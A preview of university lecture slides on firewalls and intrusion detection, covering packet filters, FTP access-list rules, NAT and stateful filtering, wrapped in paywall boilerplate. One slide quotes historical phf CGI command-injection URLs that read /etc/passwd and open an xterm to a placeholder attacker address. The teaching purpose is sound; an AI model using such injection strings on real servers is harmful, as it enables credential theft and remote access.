DOC PREVIEW
UT CS 361s - Firewalls and Intrusion Detection

This preview shows page 1-2-3-4-5-35-36-37-38-39-70-71-72-73-74 out of 74 pages.

Save
View full document
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 74 pages.
Access to all documents
Download any document
Ad free experience

Unformatted text preview:

Vitaly Shmatikov CS 361S Firewalls and Intrusion Detection slide 1slide 2 Reading Assignment Chapter 23 in Kaufman Optional: “Firewall Gateways” (chapter 3 of “Firewalls and Internet Security” by Cheswick and Bellovin) Optional: “Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection” by Ptacek and NewmanTrusted hosts and networks Firewall Router Intranet DMZ Demilitarized Zone: publicly accessible servers and networks Firewalls Idea: separate local network from the Internet slide 3Castle and Moat More like the moat around a castle than a firewall • Restricts access from the outside • Restricts outbound connections, too (!!) slide 4Why Filter Outbound Connections? whitehouse.gov: inbound X connections blocked by firewall, but input sanitization in phonebook script doesn’t filter out 0x0a (newline) http://www.whitehouse.gov/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd - displays pwd file http://www.whitehouse.gov/cgi-bin/phf? Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20attackers.ip.address:0.0 - outbound connection to attacker’s X server (permitted by the firewall) Use a cracked password to login, then buffer overflow in ufsrestore to get root slide 5 [From “The Art of Intrusion”]Firewall Locations in the Network Between internal LAN and external network At the gateways of sensitive subnetworks within the organizational LAN • Payroll’s network must be protected separately within the corporate network On end-user machines • “Personal firewall” • Standard in Microsoft Windows slide 6Types of Firewalls Packet- or session-filtering router (filter) Proxy gateway • All incoming traffic is directed to firewall, all outgoing traffic appears to come from firewall • Circuit-level: application-independent, “transparent” – Only generic IP traffic filtering (example: SOCKS) • Application-level: separate proxy for each application – Different proxies for SMTP (email), HTTP, FTP, etc. – Filtering rules are application-specific Personal firewall with application-specific rules • E.g., no outbound telnet connections from email client slide 7Illustration of Firewall Types slide 8Packet Filtering For each packet, firewall decides whether to allow it to proceed – on a per-packet basis • Stateless, cannot examine packet’s context (TCP connection, application-specific payload, etc.) Filtering rules are based on pattern-matching packet header fields • IP source and destination addresses, ports • Protocol identifier (TCP, UDP, ICMP, etc.) • TCP flags (SYN, ACK, RST, PSH, FIN) • ICMP message type slide 9Examples of Filtering Rules slide 10FTP client FTP server 20 Data 21 Command 5150 5151 Client opens command channel to server; tells server second port number Server acknowledges Server opens data channel to client’s second port Client acknowledges Connection from a random port on an external host [Wenke Lee] Example: FTP slide 11FTP Packet Filter These rules allow a user to FTP from any IP address to the FTP server at 172.168.10.12 slide 12 access-list 100 permit tcp any gt 1023 host 172.168.10.12 eq 21 access-list 100 permit tcp any gt 1023 host 172.168.10.12 eq 20 ! Allows packets from any client to the FTP control and data ports access-list 101 permit tcp host 172.168.10.12 eq 21 any gt 1023 access-list 101 permit tcp host 172.168.10.12 eq 20 any gt 1023 ! Allows the FTP server to send packets back to any IP address with TCP ports > 1023 interface Ethernet 0 access-list 100 in ! Apply the first rule to inbound traffic access-list 101 out ! Apply the second rule to outbound traffic ! “Default deny”: anything not explicitly permitted by the access list is deniedScreened Subnet Only the screened subnet is visible to the external network; internal network is invisible slide 13Screened Subnet Using Two Routers slide 14Source/Destination Address Forgery slide 15Protecting Addresses and Routes Hide IP addresses of hosts on internal network • Only services that are intended to be accessed from outside need to reveal their IP addresses • Keep other addresses secret to make spoofing harder Use NAT (network address translation) to map addresses in packet headers to internal addresses • 1-to-1 or N-to-1 mapping Filter route announcements • No need to advertise routes to internal hosts • Prevent attacker from advertising that the shortest route to an internal host lies through him slide 16Weaknesses of Packet Filters Do not prevent application-specific attacks • For example, if there is a buffer overflow in the Web server, firewall will not block an attack string No authentication • … except (spoofable) address-based authentication • Firewalls operate only at the network level Vulnerable to TCP/IP attacks such as spoofing • Solution: list of addresses for each interface (packets with internal addresses shouldn’t come from outside) Vulnerable to misconfiguration slide 17Stateless Filtering Is Not Enough In TCP connections, ports with numbers less than 1024 are permanently assigned to servers • 20, 21 - FTP, 23 - telnet, 25 - SMTP, 80 - HTTP… Clients use ports numbered from 1024 to 65535 • They must be available for clients to receive responses What should a firewall do if it sees, say, an outgoing request to some client’s port 5151? • It must allow it: this could be a server’s response in a previously established connection … … OR it could be malicious traffic • Can’t tell without keeping state for each connection slide 18Inbound SMTP Outbound SMTP Example: Using High Ports slide 19Session Filtering Decision is still made separately for each packet, but in the context of a connection • If new connection, then check against security policy • If existing connection, then look it up in the table and update the table, if necessary – Only allow packets to a high-numbered port if there is an established connection from that port – Example of an update: if RST, remove connection from table Hard to filter stateless protocols (UDP) and ICMP Filters can be bypassed with IP tunneling slide 20Example: Connection State Table slide 21Stateful or Dynamic Packet Filtering slide 22For example, ACK bit is set in both fragments, but when reassembled, SYN bit is set (can stage SYN flooding through firewall) Abnormal Fragmentation slide 23[Wenke


View Full Document

UT CS 361s - Firewalls and Intrusion Detection

Download Firewalls and Intrusion Detection
Our administrator received your request to download this document. We will send you the file to your email shortly.
Loading Unlocking...
Login

Join to view Firewalls and Intrusion Detection and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Firewalls and Intrusion Detection 2 2 and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?